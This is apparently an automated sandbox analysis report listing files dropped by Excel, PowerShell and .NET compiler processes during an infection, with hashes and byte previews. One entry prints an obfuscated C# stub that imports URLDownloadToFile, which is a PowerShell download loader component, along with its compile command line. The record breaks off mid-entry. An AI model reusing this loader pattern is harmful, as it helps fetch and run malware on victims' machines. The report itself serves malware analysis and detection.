                                                                                                                                                                              SSDEEP:12288:WLVlSKmzCJEuu6vmurYEozhngbQXgtFOEXvjDZcyJuzUcRWWZEPX4V9GsYzVyYlB:WX9R
                                                                                                                                                                              MD5:D439450CD3385B127E476E71929E8B32
                                                                                                                                                                              SHA1:ED5F78F281E5279D420E37EE7F68DA88EEAB4E77
                                                                                                                                                                              SHA-256:17458474EA7FE82E2D5BA484D82B8FE65A61692E10CF264F543394AE471EF2F9
                                                                                                                                                                              SHA-512:0DE2C6B9E56E749A435CC7E831BE161922B64BDBA14A0B7EA0F9140BD466061DCD60571D5125F6438AB67FEFCE7159B29AEB37163545A99C4F72F4408BAF499D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l...............o...........@m..?... EMF........x+..)...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2D88348.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):44256
                                                                                                                                                                              Entropy (8bit):3.1505745969216084
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:FW5NFDDUGoOjwTsiyGGiugBhUErpxTORe4ty/gE:FW1o+GGidBhUErpxTORe4tyB
                                                                                                                                                                              MD5:38B685AACF771CAD1BEC3C249143E049
                                                                                                                                                                              SHA1:84031F4FE4BDCCDAB3E699E5F705EA8B878860E0
                                                                                                                                                                              SHA-256:3B0E3807CB1B2D679CE2CB6EBF933A7D25366AD4DEA1A67457B33FCF5CA5E6EC
                                                                                                                                                                              SHA-512:6AF6B518954EF8E81C90AA86B15751B7B14D52140559EED79BC432D7A20F0C64A284C11096A51844E33FC245F74C178B337F02B2F58F096DAFBCF3C339281FDC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF5F096.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):38272
                                                                                                                                                                              Entropy (8bit):2.809737023662444
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:6/ScVovy3FA1Gi1lildmgZ4GtXUZj9hMQsRCNa6gz5ICf5OBgJP+SKA:6/bVAF1lc4GtX0MQsRCNa6gz5XOyJ1/
                                                                                                                                                                              MD5:E9FB2BC3563B12C2A7A36B0A06F2040E
                                                                                                                                                                              SHA1:3EADB50CE400CBA11D25C3002CEA42D07C2E69F0
                                                                                                                                                                              SHA-256:3B7DD54730EF8E60625996F5665CDB2B2C82259253F11485124E0DCE3E612106
                                                                                                                                                                              SHA-512:432671509F6A613763FDBBC391F4B20ADF02D6241B7F3654BA7C07C20BCF90FF10262BFFB6DFE2213B53F09338B28A71B8B759FC0135CC7BE9E8D8D749DE7110
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1gfcu5a3.m0x.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\RES3EB6.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:05:53 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                              Entropy (8bit):3.977636160114912
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:HFge9EurUWPW/edHlwKdNWI+ycuZhNDbakSYUPNnqSqd:HrUWPWGmKd41ulva3DqSK
                                                                                                                                                                              MD5:4A77382389882E348BEF76224CA368C6
                                                                                                                                                                              SHA1:66B6C30223B60E29C0CFB1138A901BCA664E9AC0
                                                                                                                                                                              SHA-256:6795638504A4D7CCA722343D501553100C45884F46C7106900BFCC41121D2E38
                                                                                                                                                                              SHA-512:F1BD0856E2427A112A3A5391DE9E5F0BDF7D47B1F63A6FB679DEF6C85106CD3034872A107D63951D2796C921A0E7519678D6C5E83F7B244EEE46D9A935835BEE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP..................*.0m.....m.a............4.......C:\Users\user\AppData\Local\Temp\RES3EB6.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.k.n.m.n.g.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\RES8131.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:06:10 2024, 1st section name ".debug$S"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                              Entropy (8bit):3.9771714481471574
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:Hye9EurirhdHdqFwKdNWI+ycuZhNnakSZPNnqSqd:PriD9qmKd41ulna3bqSK
                                                                                                                                                                              MD5:52E96D84F6B8FC0D120D84CD8600874D
                                                                                                                                                                              SHA1:019AA6F3643327E52963902D16ECF23AA0E3EFD0
                                                                                                                                                                              SHA-256:AC6E44EB794FA64B5F6F8474AD3E538D6EAF2EA2177A0F51480D719820053F08
                                                                                                                                                                              SHA-512:2930FDBE60DF556955BD3AAB1DC9700A2A49F2E8112D28ACEE21B924E0054794D01AB92EA023A28572CECFD85E3ACB69A7E683FB888EE0AE34027CCC160DD4D2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP................*MB.1A.c..4."$...........4.......C:\Users\user\AppData\Local\Temp\RES8131.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\baytxyi3.vxz.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bhv8F64.tmp

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1f8f070d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):21037056
                                                                                                                                                                              Entropy (8bit):1.139279959881017
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:E91U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:E9EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                                                              MD5:434A804587AC864CA7F8F6A47F71E449
                                                                                                                                                                              SHA1:155D51679CC5C33C90DB66A003CE4E36301FB202
                                                                                                                                                                              SHA-256:67342E2E7816F21574EF66D7A2B07EAD2FC526FCA3F41C1EF418D7F5F7DCD00E
                                                                                                                                                                              SHA-512:7E474C0D3F69768A1BD646A52E9B548D78DEA980CBD1CE3806F31048B7E7DD2F8F504500D014324F6167FE608C487C0A52D6965D880E3841BFF47F9F05517E68
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....... ........................u..............................;:...{..(....|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ftk5ompf.zvt.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hcettl45.s5s.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\jdevsgkx.xgo.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\jj3fbras.2im.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\kfigqppl.s5a.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\kqsyfh00.s0u.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                              Entropy (8bit):3.1068389628491837
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryiGak7YnqqJXPN5Dlq5J:+RI+ycuZhNnakSZPNnqX
                                                                                                                                                                              MD5:2A4D42A33141D8AF630EC234EA22249E
                                                                                                                                                                              SHA1:4C979E3C31F9860355F192D9FA74DD1F8AABE6AE
                                                                                                                                                                              SHA-256:FBEF70614B9EB950EE0B9140E788E096516B749D0A591845D35623C8E66B8D73
                                                                                                                                                                              SHA-512:01F64EA541709CEEDCB4BC4CF93C87CDE5DDCD083EB05FDF941B8E7B47F705440DCD7AF06EB9EF638694A1F925452070937D8FB9BD1F2BAA10473E9E7FAB0AF1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.r.u.g.k.2.3.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                              Entropy (8bit):3.8343091223020105
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuTocE05NVMGpJ/RQXReKJ8SRHy4HnHy7mLmW8jvwy:V/DTLDfuToXSJ8XfHmc8jvwy
                                                                                                                                                                              MD5:CF949A7E29735AD6B8A09C0CC0BEAE97
                                                                                                                                                                              SHA1:DC92E9E10F38AEAB463C00E9D75C8DBF2079C789
                                                                                                                                                                              SHA-256:445F4CADD6D07292E03D69E62FAC1AB63AD9E3AC760E46D367BEA04A4604B7B4
                                                                                                                                                                              SHA-512:29C63C01AED8621DE822517BACFE90130EF54C77A73EDFC2036DF8A1CD182B1F6A4ACFA9742B81F7276A99CF01D98F012A5A8C06F87B4C1620F92D2CCEB36041
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace oMzzGcMyN.{. public class guMpbbeGdW. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr GmfRpUt,string PMdXvN,string Ft,uint axxsiASHf,IntPtr xHWSy);.. }..}.

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                              Entropy (8bit):5.252941949522473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fN0zxs7+AEszIP23ffH:p37Lvkmb6KzCWZEonH
                                                                                                                                                                              MD5:40E46685E1BD8020AD80BD181DC565CC
                                                                                                                                                                              SHA1:E405CF6700E5BFFDB6B233144200F0967C10BE64
                                                                                                                                                                              SHA-256:F7895EB04262BAC42E35EC3F50086DE3F755A9D3380D3A6329A807B291DDBE4A
                                                                                                                                                                              SHA-512:B487044F6C72F9971B7237F27A90231AF468F59E0300BC9F25A23B894794A0EEF0F83FE770FE0C23C9864BFCD861B3D35115E270A2A8D589F488CDC6C3915B0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs"

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                              Entropy (8bit):2.8372749225747054
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:etGS4PBG5eAdF8c/kSyffDDxtkZf798dMEWI+ycuZhNnakSZPNnq:6HsAdeoyP8J79qMn1ulna3bq
                                                                                                                                                                              MD5:A1DBD4A719344AEE08926160E0AB5A9F
                                                                                                                                                                              SHA1:392C1755BF4E3DB839D936E3E30B48D48885B5F2
                                                                                                                                                                              SHA-256:562CDCA5BEC033D23B55A9C09B89CF2184D0EBE29C599F58AEA85E567D7DCC11
                                                                                                                                                                              SHA-512:393C14DB2C78D9980DA9779F7DA543835B504EDEC64F8C2DA6F862E0DCE01E24DB868169396C9D6AC61083FBA8C559288EAAA27473314E22794CFA6DB554CFAA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5.....}.....}...........................".............. C.....P ......U.........[.....c.....j.....m.....w...U.....U...!.U.....U.......!.....*.......C.......................................,..........<Module>.lr

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.out

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                              Entropy (8bit):5.3358717852880835
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:AId3ka6KzzEoOKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
                                                                                                                                                                              MD5:06EB6EC7E53AB9AF88F81E2096766C70
                                                                                                                                                                              SHA1:BD0044294028FACC8EE6BF5C93941B69117CF54C
                                                                                                                                                                              SHA-256:8B31EC383FA6AA8DE3B28F360B26667E06D484D19612D9C980C7E758FDF599D6
                                                                                                                                                                              SHA-512:CB4C521138535A95F41812F7287BFDD9C7214DCA76D74F5A9F486244CF11FCC165C5B487C04F550570E745F0867F5674EF93313993DC1227D303D704643A2706
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\n55tten3.zim.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\osyqdozz.rni.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
